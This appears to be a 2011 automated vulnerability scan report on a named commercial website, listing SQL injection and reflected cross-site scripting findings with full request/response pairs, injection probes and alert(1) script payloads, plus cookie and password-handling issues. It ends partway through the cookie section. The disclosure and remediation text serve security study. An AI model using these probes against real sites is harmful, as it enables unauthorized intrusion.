XSS, SQL Injection, DORK, CWE-79, CWE-89, insideup.com

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by XSS.CX at Sun Mar 13 07:24:20 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Loading

1. SQL injection

1.1. http://www.insideup.com/ppc/leadflow/voip10/project.php [Company_Phone_System_VoIP&iusrc parameter]

1.2. http://www.insideup.com/ppc/leadflow/voip10/project.php [REST URL parameter 2]

1.3. http://www.insideup.com/ppc/leadflow/voip10/project.php [REST URL parameter 3]

1.4. http://www.insideup.com/ppc/leadflow/voip10/project.php [REST URL parameter 4]

1.5. http://www.insideup.com/ppc/leadflow/voip10/project.php [catId parameter]

1.6. http://www.insideup.com/ppc/leadflow/voip10/project.php [name of an arbitrarily supplied request parameter]

2. Cross-site scripting (reflected)

2.1. http://www.insideup.com/ppc/leadflow/voip10/project.php [Company_Phone_System_VoIP&iusrc parameter]

2.2. http://www.insideup.com/ppc/leadflow/voip10/project.php [REST URL parameter 2]

2.3. http://www.insideup.com/ppc/leadflow/voip10/project.php [REST URL parameter 3]

2.4. http://www.insideup.com/ppc/leadflow/voip10/project.php [REST URL parameter 4]

2.5. http://www.insideup.com/ppc/leadflow/voip10/project.php [name of an arbitrarily supplied request parameter]

3. Cleartext submission of password

4. Cookie without HttpOnly flag set

4.1. http://www.insideup.com/login.html

4.2. http://www.insideup.com/ppc/leadflow/voip10/project.php

5. Password field with autocomplete enabled

6. Cross-domain Referer leakage

7. Cross-domain script include

8. Robots.txt file

9. Content type incorrectly stated

9.1. http://www.insideup.com/ppc/leadflow/style/blackdot.gif

9.2. http://www.insideup.com/ppc/leadflow/voip10/project.php

9.3. http://www.insideup.com/updateCity.html



1. SQL injection  next
There are 6 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.insideup.com/ppc/leadflow/voip10/project.php [Company_Phone_System_VoIP&iusrc parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/voip10/project.php

Issue detail

The Company_Phone_System_VoIP&iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Company_Phone_System_VoIP&iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/voip10/project.php?catId=110005&Company_Phone_System_VoIP&iusrc=gotxkw' HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 03:19:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=u9bbi2h2k09i7405009r99h490; path=/
Content-Length: 2446
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ge_url = 'leadflow/voip10/project.php?catId=110005&Company_Phone_System_VoIP&iusrc=gotxkw'' OR prj.project_page_url = 'leadflow/voip10/project.php?catId=110005&Company_Phone_System_VoIP&iusrc=gotxkw'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/voip10/project.php?catId=110005&Company_Phone_System_VoIP&iusrc=gotxkw'' at line 5

Request 2

GET /ppc/leadflow/voip10/project.php?catId=110005&Company_Phone_System_VoIP&iusrc=gotxkw'' HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 03:19:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=brrf44fa9sljl0smtpne8ea954; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47335


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.2. http://www.insideup.com/ppc/leadflow/voip10/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/voip10/project.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow'/voip10/project.php HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 03:19:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=731kfjdvns28sh771es975mkg6; path=/
Content-Length: 2030
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
= prj.templateId
   left join lead_flow_group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow'/voip10/project.php' OR prj.project_page_url = 'leadflow'/voip10/project.php/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow'/voip10/project.php/'
   union select prj.ca' at line 5

Request 2

GET /ppc/leadflow''/voip10/project.php HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.0 404 Not Found
Date: Sun, 13 Mar 2011 03:19:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=0n6uc0bukffeeaadnulan6id47; path=/
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow''/voip10/project.php was not found on this server.</p>

1.3. http://www.insideup.com/ppc/leadflow/voip10/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/voip10/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/voip10'/project.php HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 03:19:56 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=7ja03p0fasai9pf7k9rl0pgbk7; path=/
Content-Length: 2030
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
= prj.templateId
   left join lead_flow_group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/voip10'/project.php' OR prj.project_page_url = 'leadflow/voip10'/project.php/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/voip10'/project.php/'
   union select prj.ca' at line 5

Request 2

GET /ppc/leadflow/voip10''/project.php HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.0 404 Not Found
Date: Sun, 13 Mar 2011 03:19:56 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ldemffakp9rghj0fvd58duaod1; path=/
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/voip10''/project.php was not found on this server.</p>

1.4. http://www.insideup.com/ppc/leadflow/voip10/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/voip10/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/voip10/project.php' HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 03:20:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=tg5cei90gl4e97ea9qnatgril0; path=/
Content-Length: 2030
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
= prj.templateId
   left join lead_flow_group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/voip10/project.php'' OR prj.project_page_url = 'leadflow/voip10/project.php'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/voip10/project.php'/'
   union select prj.catId,prj.groupId,grps.group_na' at line 5

Request 2

GET /ppc/leadflow/voip10/project.php'' HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.0 404 Not Found
Date: Sun, 13 Mar 2011 03:20:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=93p8tmjnnpen7ciqr4vlau2qa0; path=/
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/voip10/project.php'' was not found on this server.</p>

1.5. http://www.insideup.com/ppc/leadflow/voip10/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/voip10/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/voip10/project.php?catId=110005'&Company_Phone_System_VoIP&iusrc=gotxkw HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 03:19:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1k12g020k81qnam4gtn8pegsn4; path=/
Content-Length: 2446
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ge_url = 'leadflow/voip10/project.php?catId=110005'&Company_Phone_System_VoIP&iusrc=gotxkw' OR prj.project_page_url = 'leadflow/voip10/project.php?catId=110005'&Company_Phone_System_VoIP&iusrc=gotxkw/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/voip10/project.php?catId=110005'&Company_P' at line 5

Request 2

GET /ppc/leadflow/voip10/project.php?catId=110005''&Company_Phone_System_VoIP&iusrc=gotxkw HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.0 404 Not Found
Date: Sun, 13 Mar 2011 03:19:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ccgcoplm3nv8iaitjok6pfsl86; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/voip10/project.php was not found on this server.</p>

1.6. http://www.insideup.com/ppc/leadflow/voip10/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/voip10/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/voip10/project.php?1'=1 HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 03:19:34 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jocr4ubbag3s9utls1bc9i1ev7; path=/
Content-Length: 2062
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
mplateId
   left join lead_flow_group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/voip10/project.php?1'=1' OR prj.project_page_url = 'leadflow/voip10/project.php?1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/voip10/project.php?1'=1/'
   union select pr' at line 5

Request 2

GET /ppc/leadflow/voip10/project.php?1''=1 HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.0 404 Not Found
Date: Sun, 13 Mar 2011 03:19:34 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=onb0au87f8quf1vb2jt72bgjq0; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/voip10/project.php was not found on this server.</p>

2. Cross-site scripting (reflected)  previous  next
There are 5 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.insideup.com/ppc/leadflow/voip10/project.php [Company_Phone_System_VoIP&iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/voip10/project.php

Issue detail

The value of the Company_Phone_System_VoIP&iusrc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cef3"><script>alert(1)</script>347afe432cf was submitted in the Company_Phone_System_VoIP&iusrc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ppc/leadflow/voip10/project.php?catId=110005&Company_Phone_System_VoIP&iusrc=gotxkw5cef3"><script>alert(1)</script>347afe432cf HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 03:19:45 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4i8jo8bc20p1spv39hgpsvtse7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<input type="hidden" name="iusrc" value="gotxkw5cef3"><script>alert(1)</script>347afe432cf ">
...[SNIP]...

2.2. http://www.insideup.com/ppc/leadflow/voip10/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/voip10/project.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee84b<script>alert(1)</script>41f7d0e324 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ppc/leadflowee84b<script>alert(1)</script>41f7d0e324/voip10/project.php HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Mar 2011 03:19:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=fcg663dshfie98uvcjp5q3stn6; path=/
Content-Length: 146
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflowee84b<script>alert(1)</script>41f7d0e324/voip10/project.php was not found on this server.</p>

2.3. http://www.insideup.com/ppc/leadflow/voip10/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/voip10/project.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4c8e9<script>alert(1)</script>0e968ec76ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ppc/leadflow/voip104c8e9<script>alert(1)</script>0e968ec76ad/project.php HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Mar 2011 03:19:56 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9dc3vi1el5umkv0hpk3114e4r3; path=/
Content-Length: 147
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/voip104c8e9<script>alert(1)</script>0e968ec76ad/project.php was not found on this server.</p>

2.4. http://www.insideup.com/ppc/leadflow/voip10/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/voip10/project.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6d75f<script>alert(1)</script>390635f3e25 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ppc/leadflow/voip10/project.php6d75f<script>alert(1)</script>390635f3e25 HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Mar 2011 03:20:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=5prikh9k2rnp8r2ldiu6u0n286; path=/
Content-Length: 147
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/voip10/project.php6d75f<script>alert(1)</script>390635f3e25 was not found on this server.</p>

2.5. http://www.insideup.com/ppc/leadflow/voip10/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/voip10/project.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f6782<script>alert(1)</script>6aa8c1a147e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ppc/leadflow/voip10/project.php/f6782<script>alert(1)</script>6aa8c1a147e HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Mar 2011 03:19:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=47vcgehi48gm84v92p7a2g0ic0; path=/
Content-Length: 148
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/voip10/project.php/f6782<script>alert(1)</script>6aa8c1a147e was not found on this server.</p>

3. Cleartext submission of password  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /login.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

POST /login.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 60

refererUrl=&username=username&password=password&_rememberme=

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 12:23:09 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=3A557A4F636D55A64BB5D243FAF74066; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 2589
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<script language="javascript">
function clearInput(e){
if(e.value=='username'||e.value=='password')
{e.value="";
}
}

</script>


                        <form id="loginForm" method="post">

       
        <input type="hidden" name="refererUrl" value="">
...[SNIP]...
<div style="float:left;padding:0px 0 0 8px;">
                   
                       <input style="border:1px solid #CCCCCC;height:23px;width:110px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" />
                   
                   </div>
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://www.insideup.com/login.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /login.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /login.html HTTP/1.1
